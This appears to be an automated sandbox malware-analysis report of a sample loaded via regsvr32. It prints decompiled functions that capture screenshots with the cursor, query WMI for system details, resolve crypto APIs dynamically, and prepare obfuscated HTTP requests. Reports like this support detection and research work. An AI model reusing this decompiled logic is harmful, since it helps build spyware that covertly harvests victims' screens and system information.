0x02bc5ea2
0x02bc5ea8
0x02bc5ebf
0x02bc5ecc
0x02bc5ecf
0x02bc5ed4
0x02bc5eda
0x02bc5edf
0x02bc5ee7
0x02bc5ef2
0x02bc5ef9
0x02bc5f0e
0x02bc5f23
0x02bc5f31
0x02bc5f34
0x02bc5f39
0x02bc5f3e
0x02bc5f44
0x02bc5f46
0x02bc5f4b
0x02bc5f50
0x02bc5f50
0x02bc5f4b
0x02bc5f44
0x02bc5eda
0x02bc5ea8
0x02bc5e33
0x02bc5d99
0x02bc5d86
0x02bc5d5b
0x02bc5f58
0x02bc5f63
0x02bc5f6d
0x02bc5f70
0x02bc5f70
0x02bc5f78
0x02bc5f7b
0x02bc5f7b
0x02bc5f83
0x02bc5f86
0x02bc5f86
0x02bc5f93

APIs

GetDC.USER32(00000000), ref: 02BC5D3D
CreateCompatibleDC.GDI32(00000000), ref: 02BC5D51
GetDeviceCaps.GDI32(00000000,00000008), ref: 02BC5D6A
GetDeviceCaps.GDI32(00000000,0000000A), ref: 02BC5D72
CreateCompatibleBitmap.GDI32(00000000,?,00000000), ref: 02BC5D7C
SelectObject.GDI32(00000000,00000000), ref: 02BC5D8E
BitBlt.GDI32(00000000,00000000,00000000,?,?,00000000,00000000,00000000,00CC0020), ref: 02BC5DB2
GetCursorInfo.USER32(?), ref: 02BC5DC3
CopyIcon.USER32 ref: 02BC5DD8
GetIconInfo.USER32(00000000,?), ref: 02BC5DE6
GetObjectW.GDI32(?,00000018,?), ref: 02BC5E04
DrawIconEx.USER32 ref: 02BC5E1C
SelectObject.GDI32(00000000,?), ref: 02BC5E29
GetObjectW.GDI32(00000000,00000018,?), ref: 02BC5E43
GetDIBits.GDI32(00000000,00000000,00000000,?,00000000,00000028,00000000), ref: 02BC5EBF
DeleteDC.GDI32(00000000), ref: 02BC5F70
DeleteDC.GDI32(00000000), ref: 02BC5F7B
DeleteObject.GDI32(00000000), ref: 02BC5F86

Strings

(, xrefs: 02BC5E6E
6, xrefs: 02BC5EF2

Memory Dump Source

Source File: 00000003.00000002.329921401.0000000002BC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02BC0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_2bc0000_regsvr32.jbxd

Yara matches

Similarity

API ID: Object$DeleteIcon$CapsCompatibleCreateDeviceInfoSelect$BitmapBitsCopyCursorDraw
String ID: ($6
API String ID: 192358524-4149066357
Opcode ID: 1c06dce10e98692f0940066560114bba043f704faf2fee934c134ef6399a1877
Instruction ID: ac1fa61ec22ad859a25a450fa5e99f64a8d47f35ddfd38719fcad12b1af06eda
Opcode Fuzzy Hash: 1c06dce10e98692f0940066560114bba043f704faf2fee934c134ef6399a1877
Instruction Fuzzy Hash: 21812BB1D01619ABDB25DFA4DC59BEEBBB9EF48340F508469E505F7240EB309A05CB60

Uniqueness

Uniqueness Score: -1.00%

Function 02BCE485 Relevance: 7.6, APIs: 5, Instructions: 87
commemoryCOMMON

Download Yara Rule

C-Code - Quality: 30%

			E02BCE485(void* __ecx) {
				char _v8;
				void* _v12;
				char* _t15;
				intOrPtr* _t16;
				void* _t21;
				intOrPtr* _t23;
				intOrPtr* _t24;
				intOrPtr* _t25;
				void* _t30;
				void* _t33;

				_v12 = 0;
				_v8 = 0;
				__imp__CoInitializeEx(0, 0, _t30, _t33, __ecx, __ecx);
				__imp__CoInitializeSecurity(0, 0xffffffff, 0, 0, 0, 3, 0, 0, 0);
				_t15 =  &_v12;
				__imp__CoCreateInstance(0x2bdc8a0, 0, 1, 0x2bdc8b0, _t15);
				if(_t15 < 0) {
					L5:
					_t23 = _v8;
					if(_t23 != 0) {
						 *((intOrPtr*)( *_t23 + 8))(_t23);
					}
					_t24 = _v12;
					if(_t24 != 0) {
						 *((intOrPtr*)( *_t24 + 8))(_t24);
					}
					_t16 = 0;
				} else {
					__imp__#2(__ecx);
					_t25 = _v12;
					_t21 =  *((intOrPtr*)( *_t25 + 0xc))(_t25, _t15, 0, 0, 0, 0, 0, 0,  &_v8);
					if(_t21 < 0) {
						goto L5;
					} else {
						__imp__CoSetProxyBlanket(_v8, 0xa, 0, 0, 3, 3, 0, 0);
						if(_t21 < 0) {
							goto L5;
						} else {
							_t16 = E02BC8DC9(8);
							if(_t16 == 0) {
								goto L5;
							} else {
								 *((intOrPtr*)(_t16 + 4)) = _v12;
								 *_t16 = _v8;
							}
						}
					}
				}
				return _t16;
			}

0x02bce492
0x02bce495
0x02bce498
0x02bce4a9
0x02bce4af
0x02bce4c0
0x02bce4c8
0x02bce519
0x02bce519
0x02bce51e
0x02bce523
0x02bce523
0x02bce526
0x02bce52b
0x02bce530
0x02bce530
0x02bce533
0x02bce4ca
0x02bce4cb
0x02bce4d1
0x02bce4e2
0x02bce4e7
0x00000000
0x02bce4e9
0x02bce4f6
0x02bce4fe
0x00000000
0x02bce500
0x02bce502
0x02bce50a
0x00000000
0x02bce50c
0x02bce50f
0x02bce515
0x02bce515
0x02bce50a
0x02bce4fe
0x02bce4e7
0x02bce538

APIs

CoInitializeEx.OLE32(00000000,00000000,00000000,00000000,00000000,00000000,?,02BCE7B4,00000E16,00000000,00000000,00000005), ref: 02BCE498
CoInitializeSecurity.OLE32(00000000,000000FF,00000000,00000000,00000000,00000003,00000000,00000000,00000000,?,02BCE7B4,00000E16,00000000,00000000,00000005), ref: 02BCE4A9
CoCreateInstance.OLE32(02BDC8A0,00000000,00000001,02BDC8B0,00000000,?,02BCE7B4,00000E16,00000000,00000000,00000005), ref: 02BCE4C0
SysAllocString.OLEAUT32(00000000), ref: 02BCE4CB
CoSetProxyBlanket.OLE32(00000005,0000000A,00000000,00000000,00000003,00000003,00000000,00000000,?,02BCE7B4,00000E16,00000000,00000000,00000005), ref: 02BCE4F6

Part of subcall function 02BC8DC9: RtlAllocateHeap.NTDLL(00000008,?,?,02BC9793,00000100,?,02BC661B), ref: 02BC8DD7

Memory Dump Source

Source File: 00000003.00000002.329921401.0000000002BC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02BC0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_2bc0000_regsvr32.jbxd

Yara matches

Similarity

API ID: Initialize$AllocAllocateBlanketCreateHeapInstanceProxySecurityString
String ID:
API String ID: 1610782348-0
Opcode ID: 37de7d6e9d00fe57e642367436b17f33bd058684ff684c6c33bc6ab9dd90c104
Instruction ID: e8e06250ebaa1c1c53b8902a5b007930bcb07097a1b8293ee61a23b88cbf6405
Opcode Fuzzy Hash: 37de7d6e9d00fe57e642367436b17f33bd058684ff684c6c33bc6ab9dd90c104
Instruction Fuzzy Hash: 2C210974641245BBEB248F62DC5DEABBF7CEFC2B15F10019DB505E6191EB70EA40CA60

Uniqueness

Uniqueness Score: -1.00%

Function 02BCDDE7 Relevance: 1.5, APIs: 1, Instructions: 15
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E02BCDDE7(void* __ecx) {
				struct _SYSTEM_INFO _v40;
				void* _t5;

				if(__ecx == 0) {
					GetSystemInfo( &_v40);
					return _v40.dwOemId & 0x0000ffff;
				} else {
					_t5 = 9;
					return _t5;
				}
			}

0x02bcddef
0x02bcddfa
0x02bcde05
0x02bcddf1
0x02bcddf3
0x02bcddf5
0x02bcddf5

APIs

GetSystemInfo.KERNEL32(?,?,?,?,?,?,?,?,?,02BCE1C0), ref: 02BCDDFA

Memory Dump Source

Source File: 00000003.00000002.329921401.0000000002BC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02BC0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_2bc0000_regsvr32.jbxd

Yara matches

Similarity

API ID: InfoSystem
String ID:
API String ID: 31276548-0
Opcode ID: 10cd1b654dea1b63862e46f9c8fbd3877ba1509cf4f1a9146171856f3cb0296d
Instruction ID: f046bc76e5466dc5dfd8606b422ab42a0395ac30372b19b820cf4dba66d28c52
Opcode Fuzzy Hash: 10cd1b654dea1b63862e46f9c8fbd3877ba1509cf4f1a9146171856f3cb0296d
Instruction Fuzzy Hash: 04C01265E0120B56CF14ABA5B5166EA72F89B44549F2004A6ED02F20C1EA60D9514260

Uniqueness

Uniqueness Score: -1.00%

Function 02BCEACA Relevance: 24.9, APIs: 12, Strings: 2, Instructions: 388
memoryCOMMON

Download Yara Rule

C-Code - Quality: 50%

			E02BCEACA(intOrPtr __ecx, intOrPtr __edx, void* __eflags, intOrPtr _a4) {
				signed int _v12;
				signed int _v16;
				signed int _v20;
				char _v24;
				void* _v28;
				signed int _v32;
				char _v36;
				intOrPtr _v40;
				signed int _v44;
				char _v48;
				char _v52;
				intOrPtr _v56;
				signed int _v60;
				char* _v72;
				signed short _v80;
				signed int _v84;
				char _v88;
				char _v92;
				char _v96;
				intOrPtr _v100;
				char _v104;
				char _v616;
				intOrPtr* _t159;
				char _t165;
				signed int _t166;
				signed int _t173;
				signed int _t178;
				signed int _t186;
				intOrPtr* _t187;
				signed int _t188;
				signed int _t192;
				intOrPtr* _t193;
				intOrPtr _t200;
				intOrPtr* _t205;
				signed int _t207;
				signed int _t209;
				intOrPtr* _t210;
				intOrPtr _t212;
				intOrPtr* _t213;
				signed int _t214;
				char _t217;
				signed int _t218;
				signed int _t219;
				signed int _t230;
				signed int _t235;
				signed int _t242;
				signed int _t243;
				signed int _t244;
				signed int _t245;
				intOrPtr* _t247;
				intOrPtr* _t251;
				signed int _t252;
				intOrPtr* _t253;
				void* _t255;
				intOrPtr* _t261;
				signed int _t262;
				signed int _t283;
				signed int _t289;
				char* _t298;
				void* _t320;
				signed int _t322;
				intOrPtr* _t323;
				intOrPtr _t324;
				signed int _t327;
				intOrPtr* _t328;
				intOrPtr* _t329;

				_v32 = _v32 & 0x00000000;
				_v60 = _v60 & 0x00000000;
				_v56 = __edx;
				_v100 = __ecx;
				_t159 = E02BCE485(__ecx);
				_t251 = _t159;
				_v104 = _t251;
				if(_t251 == 0) {
					return _t159;
				}
				_t320 = E02BC8DC9(0x10);
				_v36 = _t320;
				_pop(_t255);
				if(_t320 == 0) {
					L53:
					E02BC8DDF( &_v60, 0xfffffffe);
					E02BCE539( &_v104);
					return _t320;
				}
				_t165 = E02BC9F85(_t255, 0xcdd);
				 *_t328 = 0x6b4;
				_v52 = _t165;
				_t166 = E02BC9F85(_t255);
				_push(0);
				_push(_v56);
				_v20 = _t166;
				_push(_t166);
				_push(_a4);
				_t322 = E02BC9C50(_t165);
				_v60 = _t322;
				E02BC8D9A( &_v52);
				E02BC8D9A( &_v20);
				_t329 = _t328 + 0x20;
				if(_t322 != 0) {
					_t323 = __imp__#2;
					_v40 =  *_t323(_t322);
					_t173 = E02BC9F85(_t255, 0xc93);
					_v20 = _t173;
					_v52 =  *_t323(_t173);
					E02BC8D9A( &_v20);
					_t324 = _v40;
					_t261 =  *_t251;
					_t252 = 0;
					_t178 =  *((intOrPtr*)( *_t261 + 0x50))(_t261, _v52, _t324, 0, 0,  &_v32);
					__eflags = _t178;
					if(_t178 != 0) {
						L52:
						__imp__#6(_t324);
						__imp__#6(_v52);
						goto L53;
					}
					_t262 = _v32;
					_v28 = 0;
					_v20 = 0;
					__eflags = _t262;
					if(_t262 == 0) {
						L49:
						 *((intOrPtr*)( *_t262 + 8))(_t262);
						__eflags = _t252;
						if(_t252 == 0) {
							E02BC8DDF( &_v36, 0);
							_t320 = _v36;
						} else {
							 *(_t320 + 8) = _t252;
							 *_t320 = E02BC9AB3(_v100);
							 *((intOrPtr*)(_t320 + 4)) = E02BC9AB3(_v56);
						}
						goto L52;
					} else {
						goto L6;
					}
					while(1) {
						L6:
						_t186 =  *((intOrPtr*)( *_t262 + 0x10))(_t262, 0xea60, 1,  &_v28,  &_v84);
						__eflags = _t186;
						if(_t186 != 0) {
							break;
						}
						_v16 = 0;
						_v48 = 0;
						_v12 = 0;
						_v24 = 0;
						__eflags = _v84;
						if(_v84 == 0) {
							break;
						}
						_t187 = _v28;
						_t188 =  *((intOrPtr*)( *_t187 + 0x1c))(_t187, 0, 0x40, 0,  &_v24);
						__eflags = _t188;
						if(_t188 >= 0) {
							__imp__#20(_v24, 1,  &_v16);
							__imp__#19(_v24, 1,  &_v48);
							_t46 = _t320 + 0xc; // 0xc
							_t253 = _t46;
							_t327 = _t252 << 3;
							_t47 = _t327 + 8; // 0x8
							_t192 = E02BC8E5D(_t327, _t47);
							__eflags = _t192;
							if(_t192 == 0) {
								__imp__#16(_v24);
								_t193 = _v28;
								 *((intOrPtr*)( *_t193 + 8))(_t193);
								L46:
								_t252 = _v20;
								break;
							}
							 *(_t327 +  *_t253) = _v48 - _v16 + 1;
							 *((intOrPtr*)(_t327 +  *_t253 + 4)) = E02BC8DC9( *(_t327 +  *_t253) << 3);
							_t200 =  *_t253;
							__eflags =  *(_t327 + _t200 + 4);
							if( *(_t327 + _t200 + 4) == 0) {
								_t136 = _t320 + 0xc; // 0xc
								E02BC8DDF(_t136, 0);
								E02BC8DDF( &_v36, 0);
								__imp__#16(_v24);
								_t205 = _v28;
								 *((intOrPtr*)( *_t205 + 8))(_t205);
								_t320 = _v36;
								goto L46;
							}
							_t207 = _v16;
							while(1) {
								_v12 = _t207;
								__eflags = _t207 - _v48;
								if(_t207 > _v48) {
									break;
								}
								_v44 = _v44 & 0x00000000;
								_t209 =  &_v12;
								__imp__#25(_v24, _t209,  &_v44);
								__eflags = _t209;
								if(_t209 < 0) {
									break;
								}
								_t212 = E02BC9AB3(_v44);
								 *((intOrPtr*)( *((intOrPtr*)(_t327 +  *_t253 + 4)) + (_v12 - _v16) * 8)) = _t212;
								_t213 = _v28;
								_t281 =  *_t213;
								_t214 =  *((intOrPtr*)( *_t213 + 0x10))(_t213, _v44, 0,  &_v80, 0, 0);
								__eflags = _t214;
								if(_t214 < 0) {
									L39:
									__imp__#6(_v44);
									_t207 = _v12 + 1;
									__eflags = _t207;
									continue;
								}
								_v92 = E02BC9F85(_t281, 0xcc1);
								 *_t329 = 0xabe;
								_t217 = E02BC9F85(_t281);
								_t283 = _v80;
								_v96 = _t217;
								_t218 = _t283 & 0x0000ffff;
								__eflags = _t218 - 0xb;
								if(__eflags > 0) {
									_t219 = _t218 - 0x10;
									__eflags = _t219;
									if(_t219 == 0) {
										L35:
										 *((intOrPtr*)( *((intOrPtr*)(_t327 +  *_t253 + 4)) + 4 + (_v12 - _v16) * 8)) = E02BC8DC9(0x18);
										_t289 =  *((intOrPtr*)( *((intOrPtr*)(_t327 +  *_t253 + 4)) + 4 + (_v12 - _v16) * 8));
										__eflags = _t289;
										if(_t289 == 0) {
											L38:
											E02BC8D9A( &_v92);
											E02BC8D9A( &_v96);
											__imp__#9( &_v80);
											goto L39;
										}
										_push(_v72);
										_push(L"%d");
										L37:
										_push(0xc);
										_push(_t289);
										E02BC9FE4();
										_t329 = _t329 + 0x10;
										goto L38;
									}
									_t230 = _t219 - 1;
									__eflags = _t230;
									if(_t230 == 0) {
										L33:
										 *((intOrPtr*)( *((intOrPtr*)(_t327 +  *_t253 + 4)) + 4 + (_v12 - _v16) * 8)) = E02BC8DC9(0x18);
										_t289 =  *((intOrPtr*)( *((intOrPtr*)(_t327 +  *_t253 + 4)) + 4 + (_v12 - _v16) * 8));
										__eflags = _t289;
										if(_t289 == 0) {
											goto L38;
										}
										_push(_v72);
										_push(L"%u");
										goto L37;
									}
									_t235 = _t230 - 1;
									__eflags = _t235;
									if(_t235 == 0) {
										goto L33;
									}
									__eflags = _t235 == 1;
									if(_t235 == 1) {
										goto L33;
									}
									L28:
									__eflags = _t283 & 0x00002000;
									if((_t283 & 0x00002000) == 0) {
										_v88 = E02BC9F85(_t283, 0x2a);
										E02BC9FE4( &_v616, 0x100, _t237, _v80 & 0x0000ffff);
										E02BC8D9A( &_v88);
										_t329 = _t329 + 0x18;
										_t298 =  &_v616;
										L31:
										_t242 = E02BC9AB3(_t298);
										L32:
										 *( *((intOrPtr*)(_t327 +  *_t253 + 4)) + 4 + (_v12 - _v16) * 8) = _t242;
										goto L38;
									}
									_t242 = E02BCE9AE( &_v80);
									goto L32;
								}
								if(__eflags == 0) {
									__eflags = _v72 - 0xffff;
									_t298 = L"TRUE";
									if(_v72 != 0xffff) {
										_t298 = L"FALSE";
									}
									goto L31;
								}
								_t243 = _t218 - 1;
								__eflags = _t243;
								if(_t243 == 0) {
									goto L38;
								}
								_t244 = _t243 - 1;
								__eflags = _t244;
								if(_t244 == 0) {
									goto L35;
								}
								_t245 = _t244 - 1;
								__eflags = _t245;
								if(_t245 == 0) {
									goto L35;
								}
								__eflags = _t245 != 5;
								if(_t245 != 5) {
									goto L28;
								}
								_t298 = _v72;
								goto L31;
							}
							__imp__#16(_v24);
							_t210 = _v28;
							 *((intOrPtr*)( *_t210 + 8))(_t210);
							_t252 = _v20;
							L42:
							_t262 = _v32;
							_t252 = _t252 + 1;
							_v20 = _t252;
							__eflags = _t262;
							if(_t262 != 0) {
								continue;
							}
							L48:
							_t324 = _v40;
							goto L49;
						}
						_t247 = _v28;
						 *((intOrPtr*)( *_t247 + 8))(_t247);
						goto L42;
					}
					_t262 = _v32;
					goto L48;
				} else {
					E02BC8DDF( &_v36, _t322);
					_t320 = _v36;
					goto L53;
				}
			}

0x02bcead3
0x02bcead9
0x02bceae0
0x02bceae3
0x02bceae6
0x02bceaeb
0x02bceaed
0x02bceaf2
0x02bcef37
0x02bcef37
0x02bceaff
0x02bceb01
0x02bceb04
0x02bceb07
0x02bcef1c
0x02bcef22
0x02bcef2c
0x00000000
0x02bcef31
0x02bceb12
0x02bceb19
0x02bceb20
0x02bceb23
0x02bceb28
0x02bceb2a
0x02bceb2d
0x02bceb30
0x02bceb31
0x02bceb3a
0x02bceb40
0x02bceb43
0x02bceb4c
0x02bceb51
0x02bceb56
0x02bceb6d
0x02bceb7a
0x02bceb7d
0x02bceb84
0x02bceb89
0x02bceb90
0x02bceb95
0x02bceb9c
0x02bceb9e
0x02bcebaa
0x02bcebad
0x02bcebaf
0x02bcef0c
0x02bcef0d
0x02bcef16
0x00000000
0x02bcef16
0x02bcebb5
0x02bcebb8
0x02bcebbb
0x02bcebbe
0x02bcebc0
0x02bceed8
0x02bceedb
0x02bceede
0x02bceee0
0x02bcef02
0x02bcef07
0x02bceee2
0x02bceee5
0x02bceef0
0x02bceef7
0x02bceef7
0x00000000
0x00000000
0x00000000
0x00000000
0x02bcebc6
0x02bcebc6
0x02bcebd8
0x02bcebdb
0x02bcebdd
0x00000000
0x00000000
0x02bcebe5
0x02bcebe8
0x02bcebeb
0x02bcebee
0x02bcebf1
0x02bcebf4
0x00000000
0x00000000
0x02bcebfa
0x02bcec08
0x02bcec0b
0x02bcec0d
0x02bcec26
0x02bcec35
0x02bcec3d
0x02bcec3d
0x02bcec40
0x02bcec47
0x02bcec4b
0x02bcec51
0x02bcec53
0x02bceec0
0x02bceec6
0x02bceecc
0x02bceecf
0x02bceecf
0x00000000
0x02bceecf
0x02bcec62
0x02bcec76
0x02bcec7a
0x02bcec7c
0x02bcec81
0x02bcee8d
0x02bcee93
0x02bcee9e
0x02bceea9
0x02bceeaf
0x02bceeb5
0x02bceeb8
0x00000000
0x02bceeb8
0x02bcec87
0x02bcee5b
0x02bcee5b
0x02bcee5e
0x02bcee61
0x00000000
0x00000000
0x02bcec8f
0x02bcec97
0x02bcec9e
0x02bceca4
0x02bceca6
0x00000000
0x00000000
0x02bcecaf
0x02bcecc4
0x02bcecca
0x02bcecd3
0x02bcecd6
0x02bcecd9
0x02bcecdb
0x02bcee4e
0x02bcee51
0x02bcee5a
0x02bcee5a
0x00000000
0x02bcee5a
0x02bceceb
0x02bcecee
0x02bcecf5
0x02bcecfb
0x02bcecfe
0x02bced01
0x02bced04
0x02bced07
0x02bced43
0x02bced43
0x02bced46
0x02bcedef
0x02bcee03
0x02bcee13
0x02bcee17
0x02bcee19
0x02bcee30
0x02bcee34
0x02bcee3d
0x02bcee48
0x00000000
0x02bcee48
0x02bcee1f
0x02bcee20
0x02bcee25
0x02bcee25
0x02bcee27
0x02bcee28
0x02bcee2d
0x00000000
0x02bcee2d
0x02bced4c
0x02bced4c
0x02bced4f
0x02bcedb7
0x02bcedcb
0x02bceddb
0x02bceddf
0x02bcede1
0x00000000
0x00000000
0x02bcede7
0x02bcede8
0x00000000
0x02bcede8
0x02bced51
0x02bced51
0x02bced54
0x00000000
0x00000000
0x02bced56
0x02bced59
0x00000000
0x00000000
0x02bced5b
0x02bced5b
0x02bced61
0x02bced7a
0x02bced89
0x02bced92
0x02bced97
0x02bced9a
0x02bceda0
0x02bceda0
0x02bceda5
0x02bcedb1
0x00000000
0x02bcedb1
0x02bced66
0x00000000
0x02bced66
0x02bced09
0x02bced30
0x02bced35
0x02bced3a
0x02bced3c
0x02bced3c
0x00000000
0x02bced3a
0x02bced0b
0x02bced0b
0x02bced0e
0x00000000
0x00000000
0x02bced14
0x02bced14
0x02bced17
0x00000000
0x00000000
0x02bced1d
0x02bced1d
0x02bced20
0x00000000
0x00000000
0x02bced26
0x02bced29
0x00000000
0x00000000
0x02bced2b
0x00000000
0x02bced2b
0x02bcee6a
0x02bcee70
0x02bcee76
0x02bcee79
0x02bcee7c
0x02bcee7c
0x02bcee7f
0x02bcee80
0x02bcee83
0x02bcee85
0x00000000
0x00000000
0x02bceed5
0x02bceed5
0x00000000
0x02bceed5
0x02bcec0f
0x02bcec15
0x00000000
0x02bcec15
0x02bceed2
0x00000000
0x02bceb58
0x02bceb5d
0x02bceb62
0x00000000
0x02bceb66

APIs

Part of subcall function 02BCE485: CoInitializeEx.OLE32(00000000,00000000,00000000,00000000,00000000,00000000,?,02BCE7B4,00000E16,00000000,00000000,00000005), ref: 02BCE498
Part of subcall function 02BCE485: CoInitializeSecurity.OLE32(00000000,000000FF,00000000,00000000,00000000,00000003,00000000,00000000,00000000,?,02BCE7B4,00000E16,00000000,00000000,00000005), ref: 02BCE4A9
Part of subcall function 02BCE485: CoCreateInstance.OLE32(02BDC8A0,00000000,00000001,02BDC8B0,00000000,?,02BCE7B4,00000E16,00000000,00000000,00000005), ref: 02BCE4C0
Part of subcall function 02BCE485: SysAllocString.OLEAUT32(00000000), ref: 02BCE4CB
Part of subcall function 02BCE485: CoSetProxyBlanket.OLE32(00000005,0000000A,00000000,00000000,00000003,00000003,00000000,00000000,?,02BCE7B4,00000E16,00000000,00000000,00000005), ref: 02BCE4F6

Part of subcall function 02BC8DC9: RtlAllocateHeap.NTDLL(00000008,?,?,02BC9793,00000100,?,02BC661B), ref: 02BC8DD7

SysAllocString.OLEAUT32(00000000), ref: 02BCEB73
SysAllocString.OLEAUT32(00000000), ref: 02BCEB87
SysFreeString.OLEAUT32(?), ref: 02BCEF0D
SysFreeString.OLEAUT32(?), ref: 02BCEF16

Part of subcall function 02BC8DDF: HeapFree.KERNEL32(00000000,00000000), ref: 02BC8E25

Strings

TRUE, xrefs: 02BCED35
FALSE, xrefs: 02BCED3C

Memory Dump Source

Source File: 00000003.00000002.329921401.0000000002BC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02BC0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_2bc0000_regsvr32.jbxd

Yara matches

Similarity

API ID: String$AllocFree$HeapInitialize$AllocateBlanketCreateInstanceProxySecurity
String ID: FALSE$TRUE
API String ID: 1290676130-1412513891
Opcode ID: 4d1e325078d7bca7e140eb7caa5211906dab3fa9de327c2d5086b7d3a6b23e98
Instruction ID: 6ca2859dc7e7f0664de4910221d3dc935959d2336cfd1f5a6dcb6fc157a10b23
Opcode Fuzzy Hash: 4d1e325078d7bca7e140eb7caa5211906dab3fa9de327c2d5086b7d3a6b23e98
Instruction Fuzzy Hash: 5AE12A71E00619EFDB15EFA4C894EEEBBBAEF48304F20459DE515A7294DB30E941CB90

Uniqueness

Uniqueness Score: -1.00%

Function 02BD2951 Relevance: 14.1, APIs: 4, Strings: 4, Instructions: 66
libraryloaderCOMMON

Download Yara Rule

C-Code - Quality: 30%

			E02BD2951(intOrPtr* _a4) {
				signed int _v8;
				_Unknown_base(*)()* _v12;
				char _v16;
				_Unknown_base(*)()* _t15;
				void* _t20;
				intOrPtr* _t25;
				intOrPtr* _t29;
				struct HINSTANCE__* _t30;

				_v8 = _v8 & 0x00000000;
				_t30 = GetModuleHandleW(L"advapi32.dll");
				if(_t30 == 0) {
					L7:
					return 1;
				}
				_t25 = GetProcAddress(_t30, "CryptAcquireContextA");
				if(_t25 == 0) {
					goto L7;
				}
				_t15 = GetProcAddress(_t30, "CryptGenRandom");
				_v12 = _t15;
				if(_t15 == 0) {
					goto L7;
				}
				_t29 = GetProcAddress(_t30, "CryptReleaseContext");
				if(_t29 == 0) {
					goto L7;
				}
				_push(0xf0000000);
				_push(1);
				_push(0);
				_push(0);
				_push( &_v8);
				if( *_t25() == 0) {
					goto L7;
				}
				_t20 = _v12(_v8, 4,  &_v16);
				 *_t29(_v8, 0);
				if(_t20 == 0) {
					goto L7;
				}
				 *_a4 = E02BD28AC( &_v16);
				return 0;
			}

0x02bd2957
0x02bd2969
0x02bd296d
0x02bd29e1
0x00000000
0x02bd29e3
0x02bd297d
0x02bd2981
0x00000000
0x00000000
0x02bd2989
0x02bd298b
0x02bd2990
0x00000000
0x00000000
0x02bd299a
0x02bd299e
0x00000000
0x00000000
0x02bd29a0
0x02bd29a5
0x02bd29a7
0x02bd29a9
0x02bd29ae
0x02bd29b3
0x00000000
0x00000000
0x02bd29be
0x02bd29c8
0x02bd29cc
0x00000000
0x00000000
0x02bd29db
0x00000000

APIs

GetModuleHandleW.KERNEL32(advapi32.dll,00000000,00000000,00000000,02BC7C84), ref: 02BD2963
GetProcAddress.KERNEL32(00000000,CryptAcquireContextA), ref: 02BD297B
GetProcAddress.KERNEL32(00000000,CryptGenRandom), ref: 02BD2989
GetProcAddress.KERNEL32(00000000,CryptReleaseContext), ref: 02BD2998

Strings

CryptReleaseContext, xrefs: 02BD2992
advapi32.dll, xrefs: 02BD295E
CryptAcquireContextA, xrefs: 02BD2975
CryptGenRandom, xrefs: 02BD2983

Memory Dump Source

Source File: 00000003.00000002.329921401.0000000002BC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02BC0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_2bc0000_regsvr32.jbxd

Yara matches

Similarity

API ID: AddressProc$HandleModule
String ID: CryptAcquireContextA$CryptGenRandom$CryptReleaseContext$advapi32.dll
API String ID: 667068680-129414566
Opcode ID: e6723becaeb2dec286c423b46b68738e006b00bbfcf93e600b5e87db7acd69f5
Instruction ID: bf083168ce5eda6d65859cad64ed10aaa8c1570440595731edb6209dd818fa31
Opcode Fuzzy Hash: e6723becaeb2dec286c423b46b68738e006b00bbfcf93e600b5e87db7acd69f5
Instruction Fuzzy Hash: D9118232A466597BEB1196B49C42FDEB7ACDF84654F1501B1FE01E3150FB74DE008654

Uniqueness

Uniqueness Score: -1.00%

Function 02BCF7A3 Relevance: 12.3, APIs: 7, Strings: 1, Instructions: 268
COMMON

Download Yara Rule

C-Code - Quality: 93%

			E02BCF7A3(void* __edx, intOrPtr _a4, intOrPtr _a8, signed int* _a12, signed int* _a16, signed int* _a20, signed int _a24) {
				signed int _v8;
				signed int _v12;
				char _v16;
				char _v20;
				char _v24;
				intOrPtr _v28;
				int _v32;
				signed int _v36;
				intOrPtr _v40;
				intOrPtr _v44;
				intOrPtr _v48;
				intOrPtr _v52;
				char _v56;
				int _v68;
				void* _v72;
				intOrPtr _v92;
				int _v96;
				void* _v100;
				intOrPtr _v104;
				intOrPtr _v108;
				char* _v112;
				char _v116;
				char _v132;
				void _v388;
				void _v644;
				intOrPtr _t94;
				intOrPtr _t102;
				signed int _t104;
				intOrPtr* _t105;
				intOrPtr _t110;
				signed int _t111;
				signed int _t112;
				intOrPtr _t115;
				signed int _t116;
				char _t117;
				intOrPtr _t119;
				char _t122;
				intOrPtr _t127;
				signed int _t129;
				intOrPtr _t135;
				intOrPtr _t139;
				intOrPtr _t143;
				intOrPtr _t145;
				intOrPtr _t147;
				intOrPtr _t153;
				intOrPtr _t155;
				intOrPtr _t159;
				void* _t163;
				signed int _t165;
				void* _t166;
				intOrPtr _t179;
				signed int _t186;
				char _t188;
				signed int _t189;
				void* _t190;
				char _t193;
				signed int _t194;
				signed int _t195;
				void* _t196;

				_v24 = 4;
				_v32 = 0;
				_v28 = 1;
				_t190 = __edx;
				memset( &_v388, 0, 0x100);
				memset( &_v644, 0, 0x100);
				_t166 = 0x65;
				_v56 = E02BC9F6B(_t166);
				_v52 = E02BC9F6B(0xcc6);
				_v48 = E02BC9F6B(0xe03);
				_v44 = E02BC9F6B(0x64c);
				_t94 = E02BC9F6B(0x80a);
				_v36 = _v36 & 0;
				_t188 = 0x3c;
				_v40 = _t94;
				E02BC8F63( &_v116, 0, 0x100);
				_v108 = 0x10;
				_v112 =  &_v132;
				_v116 = _t188;
				_v100 =  &_v388;
				_v96 = 0x100;
				_v72 =  &_v644;
				_push( &_v116);
				_push(0);
				_v68 = 0x100;
				_push(E02BCA5D0(_t190));
				_t102 =  *0x2bdf8f0; // 0x0
				_push(_t190);
				if( *((intOrPtr*)(_t102 + 0x28))() != 0) {
					_t104 = 0;
					__eflags = 0;
					_v12 = 0;
					do {
						_t105 =  *0x2bdf8f0; // 0x0
						_v8 = 0x8404f700;
						_t189 =  *_t105( *0x2bdf9d8,  *((intOrPtr*)(_t196 + _t104 * 4 - 0x1c)), 0, 0, 0);
						__eflags = _t189;
						if(_t189 != 0) {
							E02BCF73B(_t189);
							_t110 =  *0x2bdf8f0; // 0x0
							_t111 =  *((intOrPtr*)(_t110 + 0x1c))(_t189,  &_v388, _v92, 0, 0, 3, 0, 0);
